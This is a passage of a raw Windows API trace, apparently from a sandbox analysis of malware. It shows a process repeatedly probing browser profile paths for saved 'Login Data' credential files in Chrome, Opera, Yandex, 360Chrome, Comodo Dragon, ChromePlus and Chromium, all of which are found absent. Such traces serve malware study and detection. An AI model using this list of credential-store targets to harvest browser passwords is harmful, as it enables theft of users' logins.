pdecResult=0x615b5f4) returned 0x0 [0237.445] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.445] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.445] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.445] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.445] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.445] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.445] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.445] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.445] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.445] VarDecRound (in: pdecIn=0x615b60c, cDecimals=0, pdecResult=0x615b5ec | out: pdecResult=0x615b5ec) returned 0x0 [0237.445] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.445] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.445] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.445] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.445] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.445] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.445] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.445] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.445] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.445] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.445] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.445] VarDecRound (in: pdecIn=0x615b60c, cDecimals=0, pdecResult=0x615b5ec | out: pdecResult=0x615b5ec) returned 0x0 [0237.445] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.446] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.446] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.446] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.446] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.446] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.446] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.446] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.446] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.446] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.446] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.446] VarDecRound (in: pdecIn=0x615b60c, cDecimals=0, pdecResult=0x615b5ec | out: pdecResult=0x615b5ec) returned 0x0 [0237.446] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.446] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.446] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.446] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.446] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.446] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.446] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.446] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.446] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.446] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.446] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.446] VarDecRound (in: pdecIn=0x615b60c, cDecimals=0, pdecResult=0x615b5ec | out: pdecResult=0x615b5ec) returned 0x0 [0237.446] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.446] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.446] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.447] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.447] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.447] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.447] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.447] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.447] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.447] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.447] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.447] VarDecRound (in: pdecIn=0x615b60c, cDecimals=0, pdecResult=0x615b5ec | out: pdecResult=0x615b5ec) returned 0x0 [0237.447] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.447] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.447] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.447] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.447] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.447] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.447] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.500] VarDecRound (in: pdecIn=0x615ba20, cDecimals=0, pdecResult=0x615ba30 | out: pdecResult=0x615ba30) returned 0x0 [0237.500] VarDecRound (in: pdecIn=0x615ba20, cDecimals=0, pdecResult=0x615ba30 | out: pdecResult=0x615ba30) returned 0x0 [0237.500] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Login Data", lpFilePart=0x0) returned 0x42 [0237.500] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.500] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.501] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Opera Software\\Opera Stable", nBufferLength=0x105, lpBuffer=0x615bb84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Opera Software\\Opera Stable", lpFilePart=0x0) returned 0x3d [0237.501] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bfe0) returned 1 [0237.501] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Opera Software\\Opera Stable" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\opera software\\opera stable"), fInfoLevelId=0x0, lpFileInformation=0x615c05c | out: lpFileInformation=0x615c05c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.501] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bfdc) returned 1 [0237.501] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Opera Software\\Opera Stable\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Opera Software\\Opera Stable\\Default\\Login Data", lpFilePart=0x0) returned 0x50 [0237.501] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.501] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Opera Software\\Opera Stable\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\opera software\\opera stable\\default\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.501] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.501] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", lpFilePart=0x0) returned 0x48 [0237.501] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.501] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\opera software\\opera stable\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.501] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.502] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", nBufferLength=0x105, lpBuffer=0x615bb84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", lpFilePart=0x0) returned 0x3e [0237.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bfe0) returned 1 [0237.502] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Yandex\\YandexBrowser\\User Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\yandex\\yandexbrowser\\user data"), fInfoLevelId=0x0, lpFileInformation=0x615c05c | out: lpFileInformation=0x615c05c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bfdc) returned 1 [0237.502] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x51 [0237.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.502] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\yandex\\yandexbrowser\\user data\\default\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.502] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Login Data", lpFilePart=0x0) returned 0x49 [0237.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.502] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\yandex\\yandexbrowser\\user data\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.502] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\360Chrome\\Chrome\\User Data", nBufferLength=0x105, lpBuffer=0x615bb84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\360Chrome\\Chrome\\User Data", lpFilePart=0x0) returned 0x3a [0237.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bfe0) returned 1 [0237.503] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\360Chrome\\Chrome\\User Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\360chrome\\chrome\\user data"), fInfoLevelId=0x0, lpFileInformation=0x615c05c | out: lpFileInformation=0x615c05c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bfdc) returned 1 [0237.503] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\360Chrome\\Chrome\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\360Chrome\\Chrome\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x4d [0237.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.503] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\360Chrome\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\360chrome\\chrome\\user data\\default\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.503] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\360Chrome\\Chrome\\User Data\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\360Chrome\\Chrome\\User Data\\Login Data", lpFilePart=0x0) returned 0x45 [0237.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.503] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\360Chrome\\Chrome\\User Data\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\360chrome\\chrome\\user data\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.503] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Comodo\\Dragon\\User Data", nBufferLength=0x105, lpBuffer=0x615bb84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Comodo\\Dragon\\User Data", lpFilePart=0x0) returned 0x37 [0237.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bfe0) returned 1 [0237.504] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Comodo\\Dragon\\User Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\comodo\\dragon\\user data"), fInfoLevelId=0x0, lpFileInformation=0x615c05c | out: lpFileInformation=0x615c05c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bfdc) returned 1 [0237.504] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x4a [0237.504] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.504] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\comodo\\dragon\\user data\\default\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.504] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Comodo\\Dragon\\User Data\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Comodo\\Dragon\\User Data\\Login Data", lpFilePart=0x0) returned 0x42 [0237.504] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.504] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Comodo\\Dragon\\User Data\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\comodo\\dragon\\user data\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.504] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", nBufferLength=0x105, lpBuffer=0x615bb84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", lpFilePart=0x0) returned 0x40 [0237.504] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bfe0) returned 1 [0237.504] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\maplestudio\\chromeplus\\user data"), fInfoLevelId=0x0, lpFileInformation=0x615c05c | out: lpFileInformation=0x615c05c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bfdc) returned 1 [0237.505] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x53 [0237.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.505] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\maplestudio\\chromeplus\\user data\\default\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.505] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Login Data", lpFilePart=0x0) returned 0x4b [0237.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.505] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\maplestudio\\chromeplus\\user data\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.505] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Chromium\\User Data", nBufferLength=0x105, lpBuffer=0x615bb84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Chromium\\User Data", lpFilePart=0x0) returned 0x32 [0237.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bfe0) returned 1 [0237.505] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Chromium\\User Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\chromium\\user data"), fInfoLevelId=0x0, lpFileInformation=0x615c05c | out: lpFileInformation=0x615c05c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.505] SetThreadErrorMode 